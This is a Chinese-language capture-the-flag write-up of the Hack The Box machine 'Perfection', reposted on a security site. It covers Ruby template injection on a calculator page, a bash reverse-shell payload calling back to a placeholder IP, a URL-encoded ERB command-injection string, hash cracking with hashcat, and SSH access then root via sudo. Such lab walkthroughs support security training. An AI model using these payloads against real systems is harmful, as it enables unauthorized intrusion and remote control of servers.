Hack The Box——Perfection笔记

admin
admin
admin
104949
文章
87
评论
2024年5月6日16:24:28评论1 views字数 512阅读1分42秒阅读模式
点击蓝字,关注我们

Hack The Box——Perfection笔记

机器名称:Perfection

难度:easy

  首先使用nmap进行扫描可知开启了web服务和ssh服务

Hack The Box——Perfection笔记

  访问web网站,找到一个计算页面

Hack The Box——Perfection笔记

  并且通过信息收集可知,此网站为ruby语言开发,所以尝试ssti注入,发现存在ssti注入

Hack The Box——Perfection笔记

  我们将payload先进行编码

hURL -B "bash -i >& /dev/tcp/IP/7373 0>&1"hURL -U "BASE64"
Hack The Box——Perfection笔记

  开启端口监听nc -lvnp 7373

  然后将payload传入获取shell

Hack The Box——Perfection笔记

  (此处也可直接抓包输入执行命令进行后续操作,例如KK%0A<%25%3d+`ls`+%25>)

Hack The Box——Perfection笔记

  成功找到user.txt

Hack The Box——Perfection笔记

  通过信息收集可获得susan的hash值

Hack The Box——Perfection笔记

  并且找到了hash原文的组成部分

Hack The Box——Perfection笔记

  于是使用hashcat进行爆破得到密码

Hack The Box——Perfection笔记

  通过最初的扫描可知ssh服务开启,于是登陆ssh

Hack The Box——Perfection笔记

  使用sudo su,密码与上面密码相同,然后查看root.txt即可。

Hack The Box——Perfection笔记

Hack The Box——Perfection笔记

扫码关注
微信号:hanlu_security
QQ交流群:553897268

原文始发于微信公众号(寒鹭网络安全团队):Hack The Box——Perfection笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月6日16:24:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hack The Box——Perfection笔记https://cn-sec.com/archives/2710660.html

发表评论

匿名网友 填写信息